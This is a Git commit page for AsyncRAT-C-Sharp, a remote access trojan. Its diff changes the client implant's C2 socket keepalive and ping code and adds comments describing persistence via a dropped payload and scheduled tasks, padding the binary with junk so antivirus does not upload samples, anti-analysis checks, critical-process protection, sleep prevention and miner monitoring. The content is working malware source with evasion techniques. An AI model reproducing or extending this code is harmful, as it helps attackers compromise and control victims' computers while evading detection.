Sapphire/AsyncRAT-C-Sharp
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

update

Browse Source
This commit is contained in:
NYAN CAT 2019-10-09 07:49:20 +03:00
parent be5d0d5424
commit 33fe5b69a5
4 changed files with 40 additions and 35 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

39
AsyncRAT-C#/Client/Connection/ClientSocket.cs
View File

@ -22,17 +22,19 @@ namespace Client.Connection
{
public static class ClientSocket
{
public static Socket TcpClient { get; set; }
public static SslStream SslClient { get; set; }
private static byte[] Buffer { get; set; }
private static long Buffersize { get; set; }
private static Timer Tick { get; set; }
private static MemoryStream MS { get; set; }
public static bool IsConnected { get; set; }
private static object SendSync { get; } = new object();
public static Stopwatch Pong { get; set; }
public static Socket TcpClient { get; set; } //Main socket
public static SslStream SslClient { get; set; } //Main SSLstream
private static byte[] Buffer { get; set; } //Socket buffer
private static long Buffersize { get; set; } //Recevied size
private static Timer KeepAlive { get; set; } //Send Performance
private static MemoryStream MS { get; set; } //Socket MS
public static bool IsConnected { get; set; } //Check socket status
private static object SendSync { get; } = new object(); //Sync send
private static Timer Ping { get; set; } //Send ping interval
public static int Interval { get; set; } //ping value
public static void InitializeClient()
public static void InitializeClient() //Connect & reconnect
{
try
{
@ -90,8 +92,7 @@ namespace Client.Connection
Buffer = new byte[4];
MS = new MemoryStream();
Send(IdSender.SendInfo());
Tick = new Timer(new TimerCallback(KeepAlivePacket), null, new Random().Next(15 * 1000, 30 * 1000), new Random().Next(15 * 1000, 60 * 1000));
Pong = new Stopwatch();
KeepAlive = new Timer(new TimerCallback(KeepAlivePacket), null, new Random().Next(15 * 1000, 30 * 1000), new Random().Next(15 * 1000, 60 * 1000));
SslClient.BeginRead(Buffer, 0, Buffer.Length, ReadServertData, null);
}
else
@ -126,7 +127,7 @@ namespace Client.Connection
try
{
Tick?.Dispose();
KeepAlive?.Dispose();
SslClient?.Dispose();
TcpClient?.Dispose();
MS?.Dispose();
@ -134,7 +135,7 @@ namespace Client.Connection
catch { }
}
public static void ReadServertData(IAsyncResult ar)
public static void ReadServertData(IAsyncResult ar) //Socket read/recevie
{
try
{
@ -243,9 +244,15 @@ namespace Client.Connection
msgpack.ForcePathObject("Packet").AsString = "Ping";
msgpack.ForcePathObject("Message").AsString = $"MINER {SetRegistry.GetValue(Settings.Hwid) ?? "0"} CPU {(int)IdSender.TheCPUCounter.NextValue()}% RAM {(int)IdSender.TheMemCounter.NextValue()}%";
Send(msgpack.Encode2Bytes());
Pong.Reset();
Pong.Start();
Ping?.Dispose();
Interval = 0;
Ping = new Timer(new TimerCallback(Pong), null, 1, 1);
GC.Collect();
}
private static void Pong(object obj)
{
Interval++;
}
}
}

14
AsyncRAT-C#/Client/Handle Packet/Packet.cs
View File

@ -4,12 +4,8 @@ using Client.MessagePack;
using Client.Connection;
using System;
using System.Diagnostics;
using System.IO;
using System.Net.Sockets;
using System.Reflection;
using System.Text;
using System.Threading;
using System.Windows.Forms;
using System.Collections.Generic;
using Microsoft.VisualBasic;
@ -25,12 +21,12 @@ namespace Client.Handle_Packet
unpack_msgpack.DecodeFromBytes((byte[])data);
switch (unpack_msgpack.ForcePathObject("Packet").AsString)
{
case "pong":
case "pong": //send interval value to server
{
ClientSocket.Pong.Stop();
int interval = (int)ClientSocket.Interval;
MsgPack msgPack = new MsgPack();
msgPack.ForcePathObject("Packet").SetAsString("pong");
msgPack.ForcePathObject("Message").SetAsInteger(ClientSocket.Pong.ElapsedMilliseconds);
msgPack.ForcePathObject("Message").SetAsInteger(interval);
ClientSocket.Send(msgPack.Encode2Bytes());
break;
}
@ -80,7 +76,7 @@ namespace Client.Handle_Packet
}
}
private static void Received()
private static void Received() //reset client forecolor
{
MsgPack msgpack = new MsgPack();
msgpack.ForcePathObject("Packet").AsString = "Received";
@ -88,7 +84,7 @@ namespace Client.Handle_Packet
Thread.Sleep(1000);
}
public static void Error(string ex)
public static void Error(string ex) //send to logs
{
MsgPack msgpack = new MsgPack();
msgpack.ForcePathObject("Packet").AsString = "Error";

8
AsyncRAT-C#/Client/Install/NormalStartup.cs
View File

@ -16,7 +16,7 @@ namespace Client.Install
try
{
FileInfo installPath = new FileInfo(Path.Combine(Environment.ExpandEnvironmentVariables(Settings.InstallFolder), Settings.InstallFile));
if (Process.GetCurrentProcess().MainModule.FileName != installPath.FullName)
if (Process.GetCurrentProcess().MainModule.FileName != installPath.FullName) //check if payload is running from installation path
{
for (int i = 0; i < 10; i++)
@ -24,7 +24,7 @@ namespace Client.Install
Thread.Sleep(1000);
}
foreach (Process P in Process.GetProcesses())
foreach (Process P in Process.GetProcesses()) //kill any process which shares same path
{
try
{
@ -33,7 +33,7 @@ namespace Client.Install
}
catch { }
}
if (Methods.IsAdmin())
if (Methods.IsAdmin()) //if payload is runnign as administrator install schtasks
{
Process proc = new Process
{
@ -64,6 +64,8 @@ namespace Client.Install
fs = new FileStream(installPath.FullName, FileMode.CreateNew);
byte[] clientExe = File.ReadAllBytes(Process.GetCurrentProcess().MainModule.FileName);
fs.Write(clientExe, 0, clientExe.Length);
//prevent AV from sending sample by increasing the payload size
byte[] junk = new byte[new Random().Next(40 * 1024 * 1000, 50 * 1024 * 1000)];
new Random().NextBytes(junk);
fs.Write(junk, 0, junk.Length);

14
AsyncRAT-C#/Client/Program.cs
View File

@ -23,25 +23,25 @@ namespace Client
try
{
if (!MutexControl.CreateMutex())
if (!MutexControl.CreateMutex()) //if current payload is a duplicate
Environment.Exit(0);
if (Convert.ToBoolean(Settings.Anti))
if (Convert.ToBoolean(Settings.Anti)) //run anti-virtual environment
Anti_Analysis.RunAntiAnalysis();
if (Convert.ToBoolean(Settings.Install))
if (Convert.ToBoolean(Settings.Install)) //drop payload [persistence]
NormalStartup.Install();
if (Convert.ToBoolean(Settings.BDOS) && Methods.IsAdmin())
if (Convert.ToBoolean(Settings.BDOS) && Methods.IsAdmin()) //active critical process
ProcessCritical.Set();
Methods.PreventSleep();
Methods.PreventSleep(); //prevent pc to idle\sleep
new CheckMiner().GetProcess();
new CheckMiner().GetProcess(); //check miner status
}
catch { }
while (true)
while (true) // ~ loop to check socket status
{
if (!ClientSocket.IsConnected)
{